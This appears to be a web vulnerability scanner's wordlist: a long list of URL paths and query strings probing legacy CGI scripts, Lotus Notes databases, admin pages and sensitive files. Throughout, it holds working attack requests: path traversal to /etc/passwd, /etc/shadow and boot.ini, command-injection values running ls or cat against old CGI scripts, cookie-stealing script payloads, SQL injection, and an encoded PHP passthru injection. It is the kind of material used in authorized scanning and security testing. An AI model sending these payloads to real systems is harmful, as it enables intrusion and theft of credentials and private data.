lcgi/lcgitest.nlm
com/
com/novell/
com/novell/webaccess
cgi-bin/
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
cgi-bin/ccbill-local.pl?cmd=MENU
cgi-bin/ccbill-local.cgi?cmd=MENU
cgi-bin/mastergate/search.cgi?search=0&search_on=all
cgi-bin/Backup/add-passwd.cgi
cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
cgi-bin/bslist.cgi?email=x;ls
cgi-bin/bsguest.cgi?email=x;ls
cgi-bin/nbmember.cgi?cmd=list_all_users
/admin/admin.shtml
axis-cgi/buffer/command.cgi
support/messages
cgi-bin/where.pl?sd=ls%20/etc
index.php?err=3&email=\"><script>alert(document.cookie)</script>
forgot_password.php?email=\"><script>alert(document.cookie)</script>
bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>
eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/phf
cgi-bin/upload.cgi
upload.cgi+
server-status
?PageServices
?wp-cs-dump
cfdocs.map
publisher/
cgi-bin/nph-publish.cgi
cgi-bin/nph-test-cgi
cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
counter/1/n/n/0/3/5/0/a/123.gif
iissamples/exair/search/search.asp
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
../webserver.ini
na_admin/
cpqlogin.htm
main_page.php
cpanel/
shopexd.asp?catalogid='42
shopping/diag_dbtest.asp
_vti_bin/fpcount.exe/
forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
wwwboard/passwd.txt
login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
ows-bin/perlidlc.bat?&dir
photo/
photodata/
cgi-bin/photo/
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
cgi-bin/include/new-visitor.inc.php
msadc/msadcs.dll
./../../../../../../../../../etc/*
./../../../../../../../../../etc/passw*
bytehoard/index.php?infolder=../../../../../../../../../../../etc/
Search
musicqueue.cgi
cgi-bin/musicqueue.cgi
scripts/tools/newdsn.exe
OpenFile.aspx?file=../../../../../../../../../../boot.ini
cgi-bin/windmail
cgi-bin/windmail.exe
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
index.php?vo=\"><script>alert(document.cookie);</script>
.../.../.../.../.../.../.../.../.../.../etc/passwd
cgi-bin/dose.pl?daily&somefile.txt&|ls|
admin/database/wwForum.mdb
../config.dat
iisadmpwd/aexp2.htr
iisadmpwd/aexp2b.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4.htr
iisadmpwd/aexp4b.htr
/admin/aindex.htm
cgi-bin/gbadmin.cgi?action=change_adminpass
cgi-bin/gbadmin.cgi?action=change_automail
cgi-bin/gbadmin.cgi?action=colors
cgi-bin/gbadmin.cgi?action=setup
cgi-bin/gbpass.pl
shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
admin/wg_user-info.ml
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
c32web.exe/ChangeAdminPassword
showmail.pl
reademail.pl
showmail.pl?Folder=<script>alert(document.cookie)</script>
iissamples/exair/search/query.asp
index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
index.php?offset=[%20Problem%20Here%20]
buddies.blt
buddy.blt
buddylist.blt
cgi-sys/addalink.cgi
cgi-sys/cgiecho
cgi-sys/cgiemail
cgi-sys/countedit
cgi-sys/domainredirect.cgi
cgi-sys/entropybanner.cgi
cgi-sys/entropysearch.cgi
cgi-sys/FormMail-clone.cgi
cgi-sys/helpdesk.cgi
cgi-sys/mchat.cgi
cgi-sys/randhtml.cgi
cgi-sys/realhelpdesk.cgi
cgi-sys/realsignup.cgi
cgi-sys/scgiwrap
cgi-sys/signup.cgi
pdf/
sqlnet.log
cgi-bin/GW5/GWWEB.EXE
.psql_history
acceso/
access-log
access.log
access/
access_log
acciones/
account/
accounting/
activex/
adm/
admin.htm
admin.php
admin.php3
admin.shtml
Administration/
administration/
administrator/
Admin_files/
advwebadmin/
Agent/
Agentes/
agentes/
Agents/
analog/
apache/
app/
applicattion/
applicattions/
apps/
archivar/
archive/
archives/
archivo/
asp/
Asp/
atc/
auth/
awebvisit.stat
ayuda/
backdoor/
backup/
bak/
banca/
banco/
bank/
bbv/
bdata/
bdatos/
beta/
bin/
boot/
buy/
buynow/
c/
cache-stats/
caja/
card/
cards/
cart/
cash/
ccard/
ccbill/secure/ccbill.log
cd/
cdrom/
cert/
certificado/
certificate
certificates
cfdocs/exampleapp/email/application.cfm
cfdocs/exampleapp/publish/admin/addcontent.cfm
cfdocs/exampleapp/publish/admin/application.cfm
cfdocs/examples/httpclient/mainframeset.cfm
cgi-bin/dbmlparser.exe
client/
cliente/
clientes/
clients/
cm/
code/
communicator/
compra/
compras/
compressed/
conecta/
config/checks.txt
connect/
console
correo/
counter/
credit/
crypto/
css
cuenta/
cuentas/
customers/
dan_o.dat
dat/
data/
dato/
datos/
db/
dbase/
demo/
demos/
dev/
devel/
development/
dir/
directory/
DMR/
doc-html/
down/
download/
downloads/
easylog/easylog.html
ejemplo/
ejemplos/
employees/
envia/
enviamail/
error_log
es/
excel/
Excel/
EXE/
exe/
fbsd/
file/
fileadmin/
files/
forum/
forums/
foto/
fotos/
fpadmin/
ftp/
gfx/
global/
graphics/
guest/
guestbook/
guests/
hidden/
hitmatic/
hitmatic/analyse.cgi
hits.txt
hit_tracker/
home/
homepage/
htdocs/
html/
htpasswd
HyperStat/stat_what.log
hyperstat/stat_what.log
ibill/
idea/
ideas/
imagenes/
img/
imgs/
import/
impreso/
includes/
incoming/
info/
informacion/
information/
ingresa/
ingreso/
install/
internal/
intranet/
invitado/
invitados/
java-plugin/
java/
jdbc/
job/
jrun/
js
lib/
library/
libro/
linux/
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logfile/
logfiles/
logger.html
logger/
logging/
login/
logs.txt
logs/
logs/access_log
logs/error_log
lost+found/
mail/
manage/cgi/cgiproc
marketing/
master.password
mbox
members/
message/
messaging/
ministats/admin.cgi
misc/
mkstats/
movimientos/
mp3/
mqseries/
msql/
msword/
Msword/
MSword/
NetDynamic/
NetDynamics/
netscape/
new
new/
news
nl/
noticias/
odbc/
officescan/cgi/jdkRqNotify.exe
old/
oracle
oradata/
order/
orders/
orders/checks.txt
orders/mountain.cfg
orders/orders.log
orders/orders.txt
outgoing/
ows/
pages/
Pages/
passwd
passwd.adjunct
passwd.txt
passwdfile
password
password/
passwords.txt
passwords/
PDG_Cart/
people.list
perl5/
php/
phpmyadmin/
phpMyAdmin/
pics/
piranha/secure/passwd.php3
pix/
poll
polls
porn/
pr0n/
privado/
private/
prod/
pron/
prueba/
pruebas/
pub/
public/
publica/
publicar/
publico/
purchase/
purchases/
pw/
pwd.db
python/
readme
README.TXT
readme.txt
register/
registered/
reports/
reseller/
restricted/
retail/
reviews/newpro.cgi
root/
sales/
sample/
samples/
save/
scr/
scratch
scripts/weblog
search.vts
search97.vts
secret/
secure/
secured/
sell/
server_stats/
service/
services/
servicio/
servicios/
setup/
shop/
shopper/
software/
solaris/
source/
Sources/
spwd
sql/
src/
srchadm
ss.cfg
ssi/
staff/
stat.htm
stat/
statistic/
Statistics/
statistics/
stats.htm
stats.html
stats.txt
stats/
Stats/
status/
store/
StoreDB/
stylesheet/
stylesheets/
subir/
sun/
super_stats/access_logs
super_stats/error_logs
support/
swf
sys/
system/
tar/
tarjetas/
temp/
template/
temporal/
test.htm
test.html
test.txt
test/
testing/
tests/
tmp/
tools/
tpv/
trabajo/
trafficlog/
transito/
tree/
trees/
updates/
user/
users/
users/scripts/submit.cgi
ustats/
usuario/
usuarios/
vfs/
w3perl/admin
warez/
web800fo/
webaccess.htm
webaccess/access-options.txt
webadmin/
webboard/
webcart-lite/
webcart/
webdata/
weblog/
weblogs/
webmaster_logs/
WebShop/
WebShop/logs/cc.txt
WebShop/templates/cc.txt
website/
webstats/
WebTrend/
Web_store/
windows/
word/
work/
wstats/
wusage/
www-sql/
www/
wwwboard/wwwboard.cgi
wwwboard/wwwboard.pl
wwwjoin/
wwwlog/
wwwstats.html
wwwstats/
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
zipfiles/
_pages
cgi-bin/.fhp
cgi-bin/add_ftp.cgi
cgi-bin/admin.cgi
cgi-bin/admin.php
cgi-bin/admin.php3
cgi-bin/admin.pl
cgi-bin/adminhot.cgi
cgi-bin/adminwww.cgi
cgi-bin/AnyBoard.cgi
cgi-bin/AnyForm
cgi-bin/AnyForm2
cgi-bin/ash
cgi-bin/ax-admin.cgi
cgi-bin/ax.cgi
cgi-bin/axs.cgi
cgi-bin/bash
cgi-bin/bnbform
cgi-bin/bnbform.cgi
cgi-bin/cart.pl
cgi-bin/cgimail.exe
cgi-bin/classifieds
cgi-bin/classifieds.cgi
cgi-bin/clickcount.pl?view=test
cgi-bin/code.php
cgi-bin/code.php3
cgi-bin/count.cgi
cgi-bin/csh
cgi-bin/cstat.pl
cgi-bin/c_download.cgi
cgi-bin/dasp/fm_shell.asp
cgi-bin/day5datacopier.cgi
cgi-bin/dfire.cgi
cgi-bin/dig.cgi
cgi-bin/displayTC.pl
cgi-bin/edit.pl
cgi-bin/enter.cgi
cgi-bin/environ.cgi
cgi-bin/environ.pl
cgi-bin/ex-logger.pl
cgi-bin/excite
cgi-bin/filemail
cgi-bin/filemail.pl
cgi-bin/ftp.pl
cgi-bin/ftpsh
cgi-bin/getdoc.cgi
cgi-bin/glimpse
cgi-bin/hitview.cgi
cgi-bin/jailshell
cgi-bin/jj
cgi-bin/ksh
cgi-bin/log-reader.cgi
cgi-bin/log/
cgi-bin/login.cgi
cgi-bin/login.pl
cgi-bin/logit.cgi
cgi-bin/logs.pl
cgi-bin/logs/
cgi-bin/logs/access_log
cgi-bin/logs/error_log
cgi-bin/lookwho.cgi
cgi-bin/maillist.cgi
cgi-bin/maillist.pl
cgi-bin/man.sh
cgi-bin/meta.pl
cgi-bin/minimal.exe
cgi-bin/nlog-smb.cgi
cgi-bin/nlog-smb.pl
cgi-bin/noshell
cgi-bin/nph-publish
cgi-bin/ntitar.pl
cgi-bin/pass
cgi-bin/passwd
cgi-bin/passwd.txt
cgi-bin/password
cgi-bin/post_query
cgi-bin/pu3.pl
cgi-bin/ratlog.cgi
cgi-bin/responder.cgi
cgi-bin/rguest.exe
cgi-bin/rksh
cgi-bin/rsh
cgi-bin/search.cgi
cgi-bin/search.pl
cgi-bin/session/adminlogin
cgi-bin/sh
cgi-bin/show.pl
cgi-bin/stat/
cgi-bin/stats-bin-p/reports/index.html
cgi-bin/stats.pl
cgi-bin/stats.prf
cgi-bin/stats/
cgi-bin/statsconfig
cgi-bin/stats_old/
cgi-bin/statview.pl
cgi-bin/survey
cgi-bin/survey.cgi
cgi-bin/tablebuild.pl
cgi-bin/tcsh
cgi-bin/test.cgi
cgi-bin/test/test.cgi
cgi-bin/textcounter.pl
cgi-bin/tidfinder.cgi
cgi-bin/tigvote.cgi
cgi-bin/tpgnrock
cgi-bin/ultraboard.cgi
cgi-bin/ultraboard.pl
cgi-bin/viewlogs.pl
cgi-bin/visitor.exe
cgi-bin/w3-msql
cgi-bin/w3-sql
cgi-bin/webais
cgi-bin/webbbs.cgi
cgi-bin/webbbs.exe
cgi-bin/webutil.pl
cgi-bin/webutils.pl
cgi-bin/webwho.pl
cgi-bin/wguest.exe
cgi-bin/www-sql
cgi-bin/wwwboard.cgi.cgi
cgi-bin/wwwboard.pl
cgi-bin/wwwstats.pl
cgi-bin/wwwthreads/3tvars.pm
cgi-bin/wwwthreads/w3tvars.pm
cgi-bin/zsh
adsamples/config/site.csc
advworks/equipment/catalog_type.asp
carbo.dll
clocktower/
localstart.asp
market/
mspress30/
sam
sam.bin
sam._
samples/search/queryhit.htm
scripts/counter.exe
scripts/cphost.dll
scripts/fpadmcgi.exe
scripts/postinfo.asp
scripts/samples/ctguestb.idc
scripts/samples/search/webhits.exe
site/iissamples/
vc30/
_mem_bin/
_mem_bin/FormsLogin.asp
perl/files.pl
perl5/files.pl
scripts/convert.bas
owa_util%2esignature
cgi-dos/args.bat
custdata/
hostingcontroller/
data.sql
databases/
databse.sql
db.sql
etc/passwd
img-sys/
java-sys/
javadoc/
log/
manager/
manual/
exchange/
pls/admin
account.nsf
accounts.nsf
admin.nsf
admin4.nsf
admin5.nsf
agentrunner.nsf
alog.nsf
archive/a_domlog.nsf
archive/l_domlog.nsf
a_domlog.nsf
billing.nsf
bookmark.nsf
books.nsf
busytime.nsf
calendar.nsf
certa.nsf
certlog.nsf
certsrv.nsf
chatlog.nsf
clbusy.nsf
cldbdir.nsf
clusta4.nsf
collect4.nsf
cpa.nsf
customerdata.nsf
da.nsf
database.nsf
db.nsf
dclf.nsf
DEASAppDesign.nsf
DEASLog.nsf
DEASLog01.nsf
DEASLog02.nsf
DEASLog03.nsf
DEASLog04.nsf
DEASLog05.nsf
decsadm.nsf
decsdoc.nsf
decslog.nsf
DEESAdmin.nsf
default.nsf
dirassist.nsf
doladmin.nsf
dols_help.nsf
domadmin.nsf
domcfg.nsf
event.nsf
events.nsf
events5.nsf
group.nsf
groups.nsf
help5_admin.nsf
help5_client.nsf
help5_designer.nsf
homepage.nsf
iNotes/Forms5.nsf
iNotes/Forms5.nsf/$DefaultNav
jotter.nsf
kbccv11.nsf
kbnv11.nsf
kbssvv11.nsf
lcon.nsf
ldap.nsf
leiadm.nsf
leilog.nsf
leivlt.nsf
log4a.nsf
lsxlc.nsf
l_domlog.nsf
mab.nsf
mail/adminisist.nsf
mail1.box
mail10.box
mail2.box
mail3.box
mail4.box
mail5.box
mail6.box
mail7.box
mail8.box
mail9.box
mailw46.nsf
msdwda.nsf
mtatbls.nsf
mtdata/mtstore.nsf
mtstore.nsf
nntp/nd000000.nsf
nntp/nd000001.nsf
nntp/nd000002.nsf
nntp/nd000003.nsf
nntp/nd000004.nsf
nntppost.nsf
notes.nsf
ntsync4.nsf
ntsync45.nsf
perweb.nsf
private.nsf
public.nsf
qpadmin.nsf
quickplace/quickplace/main.nsf
quickstart/qstart50.nsf
quickstart/wwsample.nsf
readme.nsf
reports.nsf
sample/faqw46
sample/framew46
sample/pagesw46
sample/siregw46
sample/site1w4646
sample/site2w4646
sample/site3w4646
schema50.nsf
secret.nsf
setupweb.nsf
smbcfg.nsf
smconf.nsf
smency.nsf
smmsg.nsf
smquar.nsf
smsolar.nsf
smtime.nsf
smtp.box
smtp.nsf
smtpibwq.nsf
smtpobwq.nsf
smtptbls.nsf
smvlog.nsf
software.nsf
srvnam.htm
statmail.nsf
stauths.nsf
stautht.nsf
stconf.nsf
stconfig.nsf
stdnaset.nsf
stdomino.nsf
stlog.nsf
streg.nsf
stsrc.nsf
test.nsf
today.nsf
userreg.nsf
users.nsf
vpuserinfo.nsf
web.nsf
webuser.nsf
welcome.nsf
wksinst.nsf
finance.xls
finances.xls
abonnement.asp
acartpath/signin.asp?|-|0|404_Object_Not_Found
add_acl
admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
admin/auth.php
admin/cfg/configscreen.inc.php+
admin/cfg/configsite.inc.php+
admin/cfg/configsql.inc.php+
admin/cfg/configtache.inc.php+
admin/cms/htmltags.php
admin/credit_card_info.php
admin/exec.php3
admin/index.php
admin/modules/cache.php+
admin/objects.inc.php4
admin/script.php
admin/settings.inc.php+
admin/templates/header.php
admin/upload.php
admin_t/include/aff_liste_langue.php
adv/gm001-mc/
aff_news.php
approval/ts_app.htm
archive.asp
archive_forum.asp
ashnews.php
auth.inc.php
b2-tools/gm-2-b2.php
bandwidth/index.cgi
basilix.php3
bigsam_guestbook.php?displayBegin=9999...9999
bin/common/user_update_passwd.pl
biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
board/index.php
board/philboard_admin.asp+
boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
bugtest+/+
caupo/admin/admin_workspace.php
ccbill/whereami.cgi
chat_dir/register.php
checkout_payment.php
communique.asp
community/forumdisplay.php
community/index.php?analized=anything
community/member.php
compte.php
config/html/cnf_gi.htm
convert-date.php
cp/rac/nsManager.cgi
CSNews.cgi
csPassword.cgi?command=remove%20
cutenews/comments.php
cutenews/search.php
cutenews/shownews.php
Data/settings.xml+
database/metacart.mdb+
db.php
dbabble
dcp/advertiser.php
defines.php
dltclnt.php
doc/admin/index.php
docs/NED
dotproject/modules/files/index_table.php
dotproject/modules/projects/addedit.php
dotproject/modules/projects/view.php
dotproject/modules/projects/vw_files.php
dotproject/modules/tasks/addedit.php
dotproject/modules/tasks/viewgantt.php
do_map
do_subscribe
email.php
emml_email_func.php
emumail.cgi?type=.%00
entete.php
enteteacceuil.php
etc/shadow+
eventcal2.php.php
ez2000/ezadmin.cgi
ez2000/ezboard.cgi
ez2000/ezman.cgi
faqman/index.php
filemanager/index.php3
filemgmt/brokenfile.php
filemgmt/singlefile.php
filemgmt/viewcat.php
filemgmt/visit.php
foro/YaBB.pl
forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd%00
forum-ra.asp?n=/../../../../../../../../../../../boot.ini
forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra.asp?n=/etc/passwd
forum-ra.asp?n=/etc/passwd%00
forum-ra.asp?n=c:\boot.ini
forum-ra_professionnel.asp?n=%60/etc/passwd%60
forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
forum-ra_professionnel.asp?n=../../boot.ini
forum-ra_professionnel.asp?n=/....../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
forum-ra_professionnel.asp?n=/../../../etc/passwd
forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra_professionnel.asp?n=/etc/passwd
forum-ra_professionnel.asp?n=/etc/passwd%00
forum-ra_professionnel.asp?n=c:\boot.ini
forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum/mainfile.php
forum/member.php
forum/newreply.php
forum/newthread.php
forum/viewtopic.php
forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu
forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=1753&amp;nn=%60/etc/passwd%60
forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00
forum1.asp?n=1753&amp;nn=/....../boot.ini
forum1.asp?n=1753&amp;nn=/..../boot.ini
forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1.asp?n=1753&amp;nn=/etc/passwd
forum1.asp?n=1753&amp;nn=/etc/passwd%00
forum1.asp?n=1753&amp;nn=c:\boot.ini
forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi
forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren
forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor
forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste
forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec
